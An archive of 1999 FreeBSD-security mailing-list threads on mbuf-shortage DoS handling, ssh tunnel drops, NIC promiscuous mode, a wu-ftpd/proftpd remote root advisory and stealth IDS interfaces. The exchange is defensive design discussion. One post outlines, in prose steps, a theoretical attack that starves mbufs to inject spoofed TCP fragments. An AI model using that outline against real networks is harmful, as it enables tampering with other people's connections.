>>> There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox
>>> catalog (catalogue). You could put these oh-so-close to the router or
>>> switch in the equipment space - maybe even braid the 10bT cables to
>>> confuse any listeners there.
>>> Then 10bF cards in the machines ensure no EMI
>>> emitted in the unsecure area. - Jy@
>>
>>You'll still have EM leakage at the converter and insecure traffic.
>>Plus, you can tap a fibre line almost as easily as you can tap a UTP
>>line.
>
> Grounded shield at the converter would solve the EM, but would make moving
> connections a real pain.

That's why we have technical assistants. :-)

> One has to wonder why security is so paramount (barring your admitted
> paranoia). Or does that require a clearance. 8-)

What, you mean I have to actually *have* a reason for all this? ;)

> As for another's mention of TEMPEST, you should check out:
>
> http://www.eskimo.com/~joelm/tempest.html

Coincidentally, I already had that page bookmarked.

From owner-freebsd-security Wed Sep 8 17:22:06 1999
From: "James C. Durham"
Date: Thu, 9 Sep 1999 00:21:04 GMT
To: freebsd-security@freebsd.org
Subject: ssh disconnects
Message-Id: <199909090021.AAA27391@w2xo.pgh.pa.us>

I have ssh forwarding ports from a machine on the internet to
another machine with a private IP here at my house.

Everything works fine, except that the connection drops at irregular
intervals, from 20 minutes to 2 or 3 days with a "connection reset
by peer" message.

I've experimented with keepalive and timeout in the config stuff to
no avail.
The only thing that seems to help is to run a script
that sends the date from the remote server every 10 seconds. This
makes it stay up for a couple days.

What's going on here? Any ideas? It's very annoying..

-Jim Durham

From owner-freebsd-security Wed Sep 8 21:55:10 1999
From: Dean
Date: Wed, 08 Sep 1999 21:53:14 -0700
To: freebsd-security@freebsd.org
Subject: Re: Layer 2 ethernet encryption?
In-reply-to: <37D61E69.58B806DF@aracnet.com>
Message-id: <4.1.19990908213955.009651a0@mail.thegrid.net>
References: <4.1.19990907190442.0096ada0@mail.thegrid.net>

At 01:29 AM 9/8/99 -0700, you wrote:
>The Mad Scientist wrote:
>
>> I do not claim to understand driver writing, but what about ripping out
>> the code that puts the NIC into promiscuous mode?
>
>I'm not a software hacker, so I couldn't tell you if that would work,
>but disabling that part of the driver might not be such a good idea.

NICs can function without these parts (AFAIK). When a card is in
promiscuous mode, it simply passes everything it picks up to the
application layer (tcpdump, snoop, nmap, etc).
When it's not in promiscuous mode, there's a filter (for lack of a
better word) that passes only those packets to the application layer.
It's my understanding that promiscuous mode just bypasses that filter.

>> You would have to modify
>> the code that allows the driver to change its MAC address, probably. But
>> if you have good network monitors, you should be able to detect a machine
>> that is pretending to be someone else pretty quickly. It's not encryption,
>> but if you're blind, you can't read the written word. It doesn't solve
>> your EM problems either.
>
>If a NIC changed its MAC, it would lose connectivity.

Some drivers (some of those for AIX, eg) allow you to change the mac
address of a card. In fact, in a Sun box any extra NICs take on the mac
address of the one on the motherboard. (Which is a little beyond me, but
it makes it easier to configure the auto-install servers at work.) Take
the card to another machine and the mac address changes.

Now, I've read ahead, and I know that your network is routed by mac
address, so it probably would lose its connection. ^_^

>
>> 'Course, I guess any user with half a brain could go out and get the
>> original driver and put it in place -- this being an open source solution.
>> So, I guess it's not such a good idea after all.
>
>Integrity checks notwithstanding, such a modification would prevent the
>machine from connecting to the network.

One day we will all be this paranoid. (I hope)

-------------------------------------------------------------------------------
Staccato signals of constant information.
From owner-freebsd-security Wed Sep 8 23:34:06 1999
From: Nick Hibma
Date: Thu, 9 Sep 1999 08:33:01 +0200 (MET DST)
To: "James C. Durham"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ssh disconnects
In-Reply-To: <199909090021.AAA27391@w2xo.pgh.pa.us>

Best guess: A firewall is expiring your connection.

If you have the problem that ftp connections go slower and slo-wer and
slo-w-e-r after the first MegaByte, you probably use the same product as
our friends around here.

Nick

> I have ssh forwarding ports from a machine on the internet to
> another machine with a private IP here at my house.
>
> Everything works fine, except that the connection drops at irregular
> intervals, from 20 minutes to 2 or 3 days with a "connection reset
> by peer" message.
>
> I've experimented with keepalive and timeout in the config stuff to
> no avail. The only thing that seems to help is to run a script
> that sends the date from the remote server every 10 seconds. This
> makes it stay up for a couple days.
>
> What's going on here? Any ideas? It's very annoying..
>
> -Jim Durham

--
ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy

From owner-freebsd-security Thu Sep 9 00:35:51 1999
Date: Thu, 9 Sep 1999 08:35:05 +0100
From: Josef Karthauser
To: "James C. Durham"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ssh disconnects
Message-ID: <19990909083505.F58237@florence.pavilion.net>
In-Reply-To: <199909090021.AAA27391@w2xo.pgh.pa.us>
Organisation: Pavilion Internet plc, 24 The Old Steine, Brighton, BN1 1EL, England

On Thu, Sep 09, 1999 at 12:21:04AM +0000, James C. Durham wrote:
> I have ssh forwarding ports from a machine on the internet to
> another machine with a private IP here at my house.
>
> Everything works fine, except that the connection drops at irregular
> intervals, from 20 minutes to 2 or 3 days with a "connection reset
> by peer" message.
>
> I've experimented with keepalive and timeout in the config stuff to
> no avail. The only thing that seems to help is to run a script
> that sends the date from the remote server every 10 seconds.
> This
> makes it stay up for a couple days.
>
> What's going on here? Any ideas? It's very annoying..
>

I have the same problem, more or less. It occurs when my winbox goes into sleep mode - during that time all TCP connections get severed at some point, including interactive sessions - well annoying!

Joe
--
Josef Karthauser            FreeBSD: How many times have you booted today?
Technical Manager           Viagra for your server (http://www.uk.freebsd.org)
Pavilion Internet plc.      [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk]

From owner-freebsd-security Thu Sep 9 02:02:52 1999
Date: Thu, 9 Sep 1999 12:02:45 +0400 (MSD)
From: Stas Kisel
Message-Id: <199909090802.MAA16555@sonet.crimea.ua>
To: freebsd-security@freebsd.org
Subject: mbuf shortage situations

> From: bmilekic@dsuper.net (Bosko Milekic)
> Having MGET store that null (e.g. fail as opposed to panic) on a
> M_WAIT seems fairly easy to fix, and would probably require some patching
> that would ensure that the packet loss is handled relatively 'cleanly'
> (probably some debugging), but I wouldn't mind doing this. However, I'd
> like to know if there are objections to doing this or, in fact, if there
> are any suggestions on how to handle mbuf shortage situations (aside from
> just limiting -- although limiting is in itself a good solution and I'm
> glad that Brian F. is working on that).
I really don't like limiting as an anti-DoS method. In user-based limiting, limits have to be divided by the "maximum number of users who can cooperate to make a DoS" - quite a non-evident number. Especially if you have many easily compromisable accounts - e.g. a shell server for university classrooms. In process-based limiting, limits also have to be divided by max proc per user. This results in very low, inconvenient limits.

Probably there are other methods (kernel swapping comes to mind, but probably it is too hard to implement).

IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c. It should be quite intelligent in selecting a target - a process or a uid which does not read properly from its sockets and has a lot of data in mbufs.

IMHO it is a bad idea to drop packets, because this can be used for SPOOFING ARBITRARY DATA into a TCP stream, which is very INSECURE[1]. Same goes for the ALREADY implemented ip_drain(), which now seems to drop all fragments.

Killing a process is not a good idea either, because it allows DoS-ing incorrectly developed applications. An attacker just has to feed so much network data that the application cannot process it (I have no example, but it is easy to imagine an application which spends more time processing a request than the network takes to transmit it - a sort of database search or remote computing or so...).

IMHO the best solution is to drop the offending connection, though it can allow DoS too, if the application can be made busy enough to not read from its sockets. But this sort of application can be DoS-ed anyway. Good applications have to read all their data from their sockets.

All other *_drain() functions should be implemented with the same care to determine the offender and not allow DoS (/sys/netinet/in_proto.c). There are programs which use Unix Domain sockets and ICMP for causing DoS by mbuf starvation, if I recall correctly.
This is a flaw in the _drain() method of eliminating this DoS - we have to find _all_ places where an incorrect or hostile application can cause the kernel to allocate mbufs. And remember about DoS when adding a new protocol or probably other code.

m_reclaim() in /sys/kern/uipc_mbuf.c should be modified (probably together with the whole _drain interface) to determine correctly the offending domain and protocol. It would be a very bad thing if in reply to frag flooding we dropped a, say, ssh connection. Or, probably, the _drain functions each have to decide - "to drain or not to drain". IMHO the 1st way is better.

--------------------------------
[1] Theoretical algorithm to spoof arbitrary data, based on a possible flaw in ip_drain().

Requirements:
1. Ability to sniff traffic (e.g., attacker is on the same Ethernet segment as the victim)
2. Quite slow connections of the client to a target.

- Sniff the network to find out a sequence number and a fragmented connection.
- Wait for a moment when only one fragment (containing sensitive information) of a packet has arrived.
- Cause mbuf starvation by not reading from sockets (there are a lot of programs for it).
- The kernel drops all fragments, including the one from the target connection.
- Kill the DoS-ing program.
- Assemble and spoof a bogus fragment instead of the dropped one.

Note: The same algorithm can be used if you decide to drop TCP packets instead of ACK-ing them.
Note: This algorithm is theoretical only - so probably I'm wrong.
--------------------------------

\bye
Stas

PS. Would some of you, folks, be so kind as to forward this message to an appropriate place, or just tell me about this place if I have made a mistake by sending it only to -hackers and to -security. The trouble is that I'm not familiar with the informal "who does what here" and "where which talks go".
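As an added illustration of the tcp_drain() policy Stas sketches (a user-space model written for this page, not FreeBSD kernel code): under mbuf pressure, account unread receive-queue bytes per uid, counting only sockets whose owner has not read from them for a while, and reset that owner's largest connection whole instead of discarding individual packets. The socket table, the `IDLE_LIMIT` threshold, the byte counts and the function names (`worst_uid`, `fattest_sock`, `drain`) are all constructed for the example.

```c
/* Added example, not code from the post or from FreeBSD: a model of the
 * "find the owner who is not reading and holds the most mbufs, then drop
 * that connection" selection policy proposed for tcp_drain(). */
#include <stdio.h>
#include <string.h>

#define MAX_SOCKS 32
#define IDLE_LIMIT 30   /* seconds without a read before a socket counts as "not read properly" (constructed) */

struct sock {
    int uid;
    int pid;
    unsigned queued;    /* bytes sitting in receive-buffer mbufs */
    unsigned idle;      /* seconds since the owning process last read from it */
    int open;           /* 0 once the model has reset the connection */
};

/* Sum unread queued bytes per uid, counting only sockets idle past IDLE_LIMIT.
 * Returns the uid with the largest total, or -1 if no socket qualifies. */
int worst_uid(const struct sock *s, int n)
{
    int best = -1;
    unsigned best_total = 0;
    for (int i = 0; i < n; i++) {
        if (!s[i].open || s[i].idle < IDLE_LIMIT)
            continue;
        unsigned total = 0;
        for (int j = 0; j < n; j++)
            if (s[j].open && s[j].uid == s[i].uid && s[j].idle >= IDLE_LIMIT)
                total += s[j].queued;
        if (total > best_total) {
            best_total = total;
            best = s[i].uid;
        }
    }
    return best;
}

/* Index of the largest idle socket owned by uid, or -1. */
int fattest_sock(const struct sock *s, int n, int uid)
{
    int best = -1;
    for (int i = 0; i < n; i++)
        if (s[i].open && s[i].uid == uid && s[i].idle >= IDLE_LIMIT &&
            (best < 0 || s[i].queued > s[best].queued))
            best = i;
    return best;
}

/* Reset whole connections until at least `need` bytes of mbufs are freed.
 * Returns bytes freed. Stops early when nothing qualifies, so a busy but
 * well-behaved application whose sockets are being read is never touched. */
unsigned drain(struct sock *s, int n, unsigned need)
{
    unsigned freed = 0;
    while (freed < need) {
        int uid = worst_uid(s, n);
        if (uid < 0)
            break;
        int k = fattest_sock(s, n, uid);
        if (k < 0)
            break;
        printf("reset: uid %d pid %d, %u bytes unread for %us\n",
               s[k].uid, s[k].pid, s[k].queued, s[k].idle);
        freed += s[k].queued;   /* the whole queue goes back to the mbuf pool */
        s[k].queued = 0;
        s[k].open = 0;
    }
    return freed;
}

/* Constructed scenario: uid 1001 runs two processes that each hold a large
 * unread queue, uid 1000 holds one bigger queue plus one it reads actively,
 * and root's session (pid 77) has a small queue that is read constantly. */
static const struct sock scenario[] = {
    /* uid   pid   queued   idle  open */
    {    0,   77,    4000,    1,  1 },
    { 1000,  501,  200000,  120,  1 },
    { 1001,  610,  150000,  300,  1 },
    { 1001,  611,  150000,  280,  1 },
    { 1000,  502,   50000,    5,  1 },
};
#define NSOCK ((int)(sizeof scenario / sizeof scenario[0]))

/* Run the scenario needing 250000 bytes back; reports bytes freed and which
 * pids lost their connection, in table order. */
unsigned run_scenario(int reset_pids[], int *nreset)
{
    struct sock s[MAX_SOCKS];
    memcpy(s, scenario, sizeof scenario);
    unsigned freed = drain(s, NSOCK, 250000);
    *nreset = 0;
    for (int i = 0; i < NSOCK; i++)
        if (!s[i].open)
            reset_pids[(*nreset)++] = s[i].pid;
    return freed;
}

int main(void)
{
    int pids[MAX_SOCKS], n;
    unsigned freed = run_scenario(pids, &n);
    printf("freed %u bytes by resetting %d connection(s)\n", freed, n);
    return 0;
}
```

Aggregating per uid rather than per socket is what makes uid 1001's two medium queues rank above uid 1000's single bigger one on the first pass; sockets that are being read stay out of the accounting entirely, so pid 77 and pid 502 are never candidates, which is the distinction the post draws between evil connections and good ones.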
From owner-freebsd-security Thu Sep 9 02:03:57 1999
Message-ID: <19990909110328.A69689@enst.fr>
Date: Thu, 9 Sep 1999 11:03:28 +0200
From: Pierre Beyssac
To: Foxfair Hu, security@FreeBSD.ORG
Subject: Re: Fw: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ]
References: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw>
In-Reply-To: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw>; from Foxfair Hu on Sat, Sep 04, 1999 at 10:28:24PM +0800

On Sat, Sep 04, 1999 at 10:28:24PM +0800, Foxfair Hu wrote:
> Forwarded by Foxfair Hu
> ---------------- Original message follows ----------------
> From: Sebastien Petit
> To: BUGTRAQ@SECURITYFOCUS.COM
> Date: Thu, 2 Sep 1999 16:53:03 +0200
> Subject: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ]
>
> Hi !
>
> There is a problem with FreeBSD 3.2-RELEASE and -STABLE and perhaps
> FreeBSD 3.x.
> The system panics when a program does multiple accesses on an nfs v3 mounted directory
> with default mount options (ie: mount x.x.x.x:/nfs /usr2).
Note that the author sent a PR about that just a few days before he posted to Bugtraq: kern/13488

--
Pierre Beyssac
pb@enst.fr

From owner-freebsd-security Thu Sep 9 03:18:53 1999
From: Darren Reed
Message-Id: <199909091015.UAA02113@cheops.anu.edu.au>
Subject: Re: mbuf shortage situations
To: stas@sonet.crimea.ua (Stas Kisel)
Date: Thu, 9 Sep 1999 20:15:47 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199909090802.MAA16555@sonet.crimea.ua> from "Stas Kisel" at Sep 9, 99 12:02:45 pm

In some mail from Stas Kisel, sie said:
[...]
> IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c
> It should be quite intelligent in selecting a target - a process or a uid
> which does not read properly from its sockets and has a lot of data in mbufs.

The problem with this is the BSD TCP/IP implementation ACK's (or at least attempts to ACK) data as soon as it is received and it is a big no-no to discard queued data that has already been ACK'd.
Darren

From owner-freebsd-security Thu Sep 9 03:40:15 1999
Date: Thu, 9 Sep 1999 13:37:43 +0400 (MSD)
From: Stas Kisel
Message-Id: <199909090937.NAA18028@sonet.crimea.ua>
To: avalon@coombs.anu.edu.au
Subject: Re: mbuf shortage situations
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <199909091015.UAA02113@cheops.anu.edu.au>

> From: Darren Reed
>
> In some mail from Stas Kisel, sie said:
> [...]
> > IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c
> > It should be quite intelligent in selecting a target - a process or a uid
> > which does not read properly from its sockets and has a lot of data in mbufs.
>
> The problem with this is the BSD TCP/IP implementation ACK's (or at least
> attempts to ACK) data as soon as it is received and it is a big no-no to
> discard queued data that has already been ACK'd.

It is a big no-no first to discard a packet and then to continue the connection. But we can easily send an RST and drop the connection (clean the buffer first, because we don't even have memory for an RST packet, or, better, send it only with the next packet that arrives on the dropped connection). And this is probably what will happen if the limit is reached, too. And in case an evil thief has stolen the Ethernet cable while a connection is in progress, too :) (Just why I think the RFC should permit dropping the connection).

--
Stas Kisel. UNIX, security, C, TCP/IP, Web.
UNIX - the best adventure game
http://www.tekmetrics.com/transcript.shtml?pid=20053
http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu
stas@sonet.crimea.ua ; 2:460/54.4

From owner-freebsd-security Thu Sep 9 03:46:35 1999
Date: Thu, 9 Sep 1999 13:45:39 +0400 (MSD)
From: Stas Kisel
Message-Id: <199909090945.NAA18133@sonet.crimea.ua>
To: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua
Subject: Re: mbuf shortage situations
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <199909091015.UAA02113@cheops.anu.edu.au>

> From: Darren Reed
> The problem with this is the BSD TCP/IP implementation ACK's (or at least
> attempts to ACK) data as soon as it is received and it is a big no-no to
> discard queued data that has already been ACK'd.

Probably it is not self-evident why we HAVE to drop this connection.

It is an evil connection. Good applications do read data from their sockets, and evil ones do not. And even if it is a good but silly or busy application, good clients do not send so much data that the application cannot process it. Am I wrong, are there any examples?

--
Stas Kisel. UNIX, security, C, TCP/IP, Web.
UNIX - the best adventure game
http://www.tekmetrics.com/transcript.shtml?pid=20053
http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu
stas@sonet.crimea.ua ; 2:460/54.4

From owner-freebsd-security Thu Sep 9 06:02:42 1999
Message-ID: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>
From: Bill Fink
To: "'freebsd-security@freebsd.org'"
Subject: FTP Vulnerability
Date: Thu, 9 Sep 1999 09:03:01 -0400

I truly apologize, I trust I'm overlooking something here.

The advisory below states:

>> Upgrade your wu-ftpd or proftpd
>> ports to the most recent versions
>> (any version after August 30, 1999
>> is not impacted by this problem).

I've visited the mirrors for the WUFTP site(s) looking for the versions "after August 30" and there's NOTHING newer than MAY.

Regards,
Bill

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-99:03                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          Two ftp daemons in ports vulnerable to attack.

Category:       ports
Module:         wu-ftpd and proftpd
Announced:      1999-09-05
Affects:        FreeBSD 3.2 (and earlier)
                FreeBSD-current before the correction date.
Corrected:      FreeBSD-3.3 RELEASE
                FreeBSD-current as of 1999/08/30
FreeBSD only:   NO

Patches:        NONE

I.
Background

wuftpd and proftpd have a flaw which can lead to a remote root compromise. They are both vulnerable since they are both based on a code base that is vulnerable.

II. Problem Description

Remote users can gain root via a buffer overflow.

III. Impact

Remote users can gain root.

IV. Workaround

Disable the ftp daemon until you can upgrade your system.

V. Solution

Upgrade your wu-ftpd or proftpd ports to the most recent versions (any version after August 30, 1999 is not impacted by this problem). If you are running non-port versions, you should verify that your version is not vulnerable or upgrade to using the ports version of these programs.

=============================================================================
FreeBSD, Inc.

Web Site:                       http://www.freebsd.org/
Confidential contacts:          security-officer@freebsd.org
Security notifications:         security-notifications@freebsd.org
Security public discussion:     freebsd-security@freebsd.org
PGP Key:                        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc

Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary.
=============================================================================
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBN9MsfFUuHi5z0oilAQHKYQP/SGjOSQ8Ph8VqLtpStVOl6L0ocoYKv59R
B6ow00bchILYV7qlsIGFhwMITZxZH0aGd0EAxwfFKwfvu36zSzAvu1rGrFCjT5Xd
zefzAQUgj1/rWm3Jp1DxMd2BKCJrvTCOjKngIbbA2tH3AZ9xHiwefpqtIHVPikmy
XR9gpyqCj/E=
=dyHS
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Sep 9 06:02:47 1999
From: "Lowkrantz, Goran"
To: freebsd-security@FreeBSD.ORG
Subject: Listen only NIC
Date: Thu, 9 Sep 1999 10:37:07 +0200

To check on our DMZs I am building a monitor system with a protected interface connected to the internal network and a multiport card to monitor the consoles of the systems in the DMZs.
To check for attacks I have set up Snort and have tested with the Vision IDS, but I want to hide the network interface completely so that it can't be seen or heard or attacked or anything. I have looked in the handbook, security how-to and searched mailing lists but not found anything about how to do this.

The monitor system is on 3-stable, at the moment 3.3RC.

What I would like to have: A NIC listening on a connected network using one of the already used addresses without being seen and without disturbing any traffic.

1 - Is it possible to configure a NIC this way?
2 - If not, I have tried to re-use an IP address from the DMZ, set IPFW to allow all in and nothing out, but an arp from the DMZ still shows the IF. How do I block this?
3 - Am I off track? Is there a better way to do this?

Cheers,
GLZ

---
Goran Lowkrantz             Email: goran.lowkrantz@infologigruppen.se
Infologigruppen Alfa AB     Telephone: Nat 070-587 8782    Fax: Nat 070-615 8782
Box 202                                Int +46 70-587 8782      Int +46 70-615 8782
941 25 Pitea, Sweden

From owner-freebsd-security Thu Sep 9 06:16:17 1999
From: Darren Reed
Message-Id: <199909091315.XAA05192@cheops.anu.edu.au>
Subject: Re: mbuf shortage situations
To: stas@sonet.crimea.ua (Stas Kisel)
Date: Thu, 9 Sep 1999 23:15:43 +1000 (EST)
Cc: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <199909090945.NAA18133@sonet.crimea.ua> from "Stas Kisel" at Sep 9, 99 01:45:39 pm
In some mail from Stas Kisel, sie said:
>
> > From: Darren Reed
>
> > The problem with this is the BSD TCP/IP implementation ACK's (or at least
> > attempts to ACK) data as soon as it is received and it is a big no-no to
> > discard queued data that has already been ACK'd.
>
> Probably it is not self-evident why we HAVE to drop this connection.
>
> It is an evil connection. Good applications do read data from their sockets,
> and evil ones do not. And even if it is a good but silly or busy
> application, good clients do not send so much data that the application
> cannot process it. Am I wrong, are there any examples?

So what if someone manages to crash a program due to a DOS attack? An easy one that comes to mind is syslogd. It's often stuck in disk-wait and can easily be targeted with a large number of packets.

From owner-freebsd-security Thu Sep 9 06:19:39 1999
From: Fernando Schapachnik
Message-Id: <199909091316.KAA08485@ns1.sminter.com.ar>
Subject: Re: FTP Vulnerability
In-Reply-To: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> from Bill Fink at "Sep 9, 99 09:03:01 am"
To: bill@billfink.com (Bill Fink)
Date: Thu, 9 Sep 1999 10:16:54 -0300 (GMT)
Cc: freebsd-security@FreeBSD.ORG
In an earlier message, Bill Fink wrote:
[There is text before the PGP section.]
>
>
> I truly apologize, I trust I'm overlooking something here.
>
> The advisory below states:
>
> >> Upgrade your wu-ftpd or proftpd
> >> ports to the most recent versions
         ^^^^^

Go to http://www.freebsd.org/ports and grab a new version from there. On WU-FTP sites you can find 2.5.0 + patches.

Regards.

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA
Diagonal Roque Sáenz Peña 971, 4th and 5th floor.
1035 - Capital Federal, Argentina.
(54-11) 4323-3333
http://www.via-net-works.net.ar

From owner-freebsd-security Thu Sep 9 06:25:55 1999
Date: Thu, 9 Sep 1999 16:22:55 +0300
From: Ruslan Ermilov
To: Bill Fink
Cc: security@FreeBSD.ORG
Subject: Re: FTP Vulnerability
Message-ID: <19990909162255.A15548@relay.ucb.crimea.ua>
References: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>
In-Reply-To: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>; from Bill Fink on Thu, Sep 09, 1999 at 09:03:01AM -0400

On Thu, Sep 09, 1999 at 09:03:01AM -0400, Bill Fink wrote:
>
>
> I truly apologize, I
> trust I'm overlooking something here.
>
> The advisory below states:
>
> >> Upgrade your wu-ftpd or proftpd
> >> ports to the most recent versions
> >> (any version after August 30, 1999
> >> is not impacted by this problem).
>
> I've visited the mirrors for the WUFTP site(s) looking for the versions
> "after August 30" and there's NOTHING newer than MAY.
>
The versions we are talking about refer to the FreeBSD ports collection. The port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the following patch:

ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch

Cheers,
--
Ruslan Ermilov          Sysadmin and DBA of the
ru@ucb.crimea.ua        United Commercial Bank,
ru@FreeBSD.org          FreeBSD committer,
+380.652.247.647        Simferopol, Ukraine

http://www.FreeBSD.org  The Power To Serve
http://www.oracle.com   Enabling The Information Age

From owner-freebsd-security Thu Sep 9 06:29:01 1999
Date: Thu, 9 Sep 1999 06:28:43 -0700
From: "Ron 'The InSaNe One' Rosson"
To: Bill Fink
Cc: freebsd-security@freebsd.org
Subject: Re: FTP Vulnerability
Message-ID: <19990909062843.A590@lunatic.oneinsane.net>
References: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>
In-Reply-To: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>; from Bill Fink on Thu, Sep 09, 1999 at 09:03:01AM -0400

On Thu, 09 Sep 1999, Bill Fink was heard blurting out:
>
>
> I truly apologize, I trust I'm overlooking something here.
>
> The advisory below states:
>
> >> Upgrade your wu-ftpd or proftpd
> >> ports to the most recent versions
> >> (any version after August 30, 1999
> >> is not impacted by this problem).
>
> I've visited the mirrors for the WUFTP site(s) looking for the versions
> "after August 30" and there's NOTHING newer than MAY.
>

Take a look at the patches in the ports tree for these ports and you will see the changes.

>
> =============================================================================
> FreeBSD-SA-99:03                                           Security Advisory
>                                                                 FreeBSD, Inc.
>
> Topic:          Two ftp daemons in ports vulnerable to attack.
>
> Category:       ports
> Module:         wu-ftpd and proftpd
> Announced:      1999-09-05
> Affects:        FreeBSD 3.2 (and earlier)
>                 FreeBSD-current before the correction date.
> Corrected:      FreeBSD-3.3 RELEASE
>                 FreeBSD-current as of 1999/08/30
> FreeBSD only:   NO
>
> Patches:        NONE
>
> I. Background
>
> wuftpd and proftpd have a flaw which can lead to a remote root
> compromise. They are both vulnerable since they are both based on a
> code base that is vulnerable.
>
> II.
> Problem Description
>
> Remote users can gain root via a buffer overflow.
>
> III. Impact
>
> Remote users can gain root.
>
> IV. Workaround
>
> Disable the ftp daemon until you can upgrade your system.
>
> V. Solution
>
> Upgrade your wu-ftpd or proftpd ports to the most recent versions (any
> version after August 30, 1999 is not impacted by this problem). If
> you are running non-port versions, you should verify that your version
> is not vulnerable or upgrade to using the ports version of these
> programs.
>
> =============================================================================
> FreeBSD, Inc.
>
> Web Site:                       http://www.freebsd.org/
> Confidential contacts:          security-officer@freebsd.org
> Security notifications:         security-notifications@freebsd.org
> Security public discussion:     freebsd-security@freebsd.org
> PGP Key:                        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc
>
> Notice: Any patches in this document may not apply cleanly due to
>         modifications caused by digital signature or mailer software.
>         Please reference the URL listed at the top of this document
>         for original copies of all patches if necessary.
> =============================================================================
>

--
-------------------------------------------------------------------
Ron Rosson                              ... and a UNIX user said ...
The InSaNe One                                   rm -rf *
insane@oneinsane.net                     and all was null and void
-------------------------------------------------------------------
Practice random acts of intelligence and senseless acts of self-control.

From owner-freebsd-security Thu Sep 9 06:44:46 1999
Message-ID: <37D7B90D.B252B4E6@tdx.co.uk>
Date: Thu, 09 Sep 1999 14:41:33 +0100
From: Karl Pielorz
Organization: TDX - The Digital eXchange
To: Darren Reed
Cc: Stas Kisel, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: mbuf shortage situations
References: <199909091315.XAA05192@cheops.anu.edu.au>

Darren Reed wrote:
> > It is an evil connection. Good applications do read data from their sockets,
> > and evil ones do not. And even if it is a good but silly or busy
> > application, good clients do not send so much data that the application
> > cannot process it. Am I wrong, are there any examples?
>
> So what if someone manages to crash a program due to a DOS attack?
> An easy one that comes to mind is syslogd. It's often stuck in disk-wait
> and can easily be targeted with a large number of packets.

Isn't syslog UDP? - i.e. no ACK? - you could argue (to a point) that this might even be by design?
:) (with regard to if syslog is in diskwait, and over burdened with traffic,
data gets dropped). This could be construed as a DoS (in fact it probably
is)...

If you look to real life, not many systems are DoS proof - most real life
scenarios work by detection and subsequent action, e.g. if you start calling
the firemen out all over town (DoS'ing the fire service) - you will hopefully
be detected, and removed :)

You could try to prevent this, by having say limits on buffers per process,
or through something like Inetd (i.e. throttling). You could even take Inetd
a stage further and say "if excessive from same IP, stop responding to that
IP for 'x' time", but even then people who are determined will only (and
easily with the current Internet) start launching multi-homed attacks, DoS's
etc.

How long before servers only accept connections from hosts presenting a
valid 'certificate'? - How long until the certificates themselves are forged?

At the end of the day, you have 1 box with limited resources - trying to
handle the situation. Even if it's well behaved (doesn't crash) - something
has to give, i.e. the service may shut down for a while. The sad fact is,
this is exactly what a DoS is trying to achieve, and will achieve until some
intervening action is taken. You can only slow & detect it - you can't
readily stop it - there is no 'easy' fix for this...

[You could argue SysAdmins are a fix? No?]
Just my $0.02+1's worth

-Karl

From owner-freebsd-security Thu Sep 9 6:58:24 1999
From: Darren Reed
Message-Id: <199909091356.XAA05823@cheops.anu.edu.au>
Subject: Re: mbuf shortage situations
To: kpielorz@tdx.co.uk (Karl Pielorz)
Date: Thu, 9 Sep 1999 23:56:57 +1000 (EST)
Cc: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To: <37D7B90D.B252B4E6@tdx.co.uk> from "Karl Pielorz" at Sep 9, 99 02:41:33 pm

In some mail from Karl Pielorz, sie said:
>
> Darren Reed wrote:
>
> > > It is an evil connection. Good applications do read data from their sockets,
> > > and evil ones do not. And even if it is a good but silly or busy
> > > application, good clients do not send so much data that the application
> > > cannot process it. Am I wrong? Are there any examples?
> >
> > So what if someone manages to crash a program due to a DOS attack ?
> > An easy one that comes to mind is syslogd. It's often stuck in disk-wait
> > and can easily be targeted with a large number of packets.
>
> Isn't syslog UDP? - i.e. no ACK? - you could argue (to a point) that this
> might even be by design? :) (with regard to if syslog is in diskwait, and over
> burdened with traffic, data gets dropped). This could be construed as a DoS
> (in fact it probably is)...
